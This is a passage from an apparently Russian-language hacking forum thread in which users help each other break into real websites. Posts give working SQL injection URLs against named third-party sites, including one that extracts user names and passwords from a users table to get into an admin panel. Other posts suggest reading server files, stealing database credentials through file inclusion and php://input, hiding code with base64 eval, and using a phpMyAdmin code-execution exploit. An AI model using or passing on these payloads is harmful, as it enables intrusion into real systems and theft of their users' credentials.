про /scripts/setup.php я так и не понял, что ты имел в виду. если ты про код, который берется с ftp, то никаких там проблем с кавычками нет, сейчас протестил: PHP: <?php echo "<br>".get_magic_quotes_gpc()."<br>"; echo "'x'<br>"; echo $_SERVER['PHP_SELF']; exit; ?> => 1 'x' /pma/scripts/setup.php кстати, если бы "проблемы" с кавычками были бы, то их легко можно было бы решить при помощи, например, eval(base64_decode(blalba))) ] кста, вариант с кодом на ftp не работает при allow_url_fopen = Off
помогите найти столбцы, брут не помог Version: 4.0.26-nt Code: http://www.brew-monkey.com/brewschool/hop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
и что ты ожидаешь? что у кого то есть паранормальный брут который прям угадает столбцы?сам делай словарь и бруть по нему... попробуй прочитать файлы на сервере, c:/boot.ini
попробуй в эту сторону глянуть, у них там этот форум: http://forum.snitz.com/ бесплатный, скачай и посмотри таблицы/колонки
а можно рабочий пример где это потестить можно ? или хотя бы версию pma и mysql бо у себя пробовал на localhost, phpMyAdmin-2.10.2, 5.1.40-community - не фига не выходит ps: здесь: http://forum.antichat.ru/threadnav46016-340-10.html и здесь: http://forum.antichat.ru/threadnav50669-1-40-phpMyAdmin.html все прочел
Не могу попасть в админку. http://alvand.basu.ac.ir/~flora/family.php?id=29+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,Id, user_name, password)+from+users+limit+0,1),1,64),floor(rand(0)*2)))z)+--+ Id, user_name, password http://alvand.basu.ac.ir/login.php aa:ss a:a
есть доступ к админке каторая правит странички. добавляю <? echo("ololol"); ?> Но выводит почему-то как html : <td> <?php echo("dd"); ?> 2 </td> почему такая шляпа?
Потому что страничка небойсь в mysql идёт? Из mysql, знаешь ли не интерпретируется код.. Вы вообще читать умеете, я про ту багу, которую я описал пару страничек назад?
канэчна рядовой [на кэпа, чисто по званию, сие изречения как-то не тянет ] 17.06.2010, 18:01 Ctacok 17.06.2010, 19:21 Ctacok Цитата: где там ? речь шла о http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/ где используется уязвимость unserialize() а не где создается новый config/config.inc.php. если ты тут админ, то не значит что ты кого-то умнее, это значит что тебе непозволительно тупить, что ты как раз похоже и сделал. если я не прав, объясни на "пальцах" чего я не "сумел прочитать", только конкретно, понятно и с цитатами/ссылками, а не голословными заявлениями и объяснениями не понятно о каких дырах.
а как можно заюзать open_basedir bypass удалённо? пробовал инклудить через Data протокол, не получалось (RFC 2397) еще есть идея попробовать обойти ограничение на длину в addslashes, сработает? или для open_basedir пофиг будет?
Помогите вывести версию БД. http://www.barenbrug.sk/index.php?siteid=66&page=item&nieuwsid=210')+and+substring(version(),1,1)=5+and+('1'='1 , или какие баги у этого движка: RegioProviders CMS: 4.1.1, DB 4.1.1
iSlava попробуй Чтение php-кода из файла при наличии LFI можешь, если прокатит, исходники сайта с данными для коннекта к mysql угнать как же, там же, в Self-contained RFI in PHP посмотри исполнение через php://input, может он прокатит, раз через data не прокатило.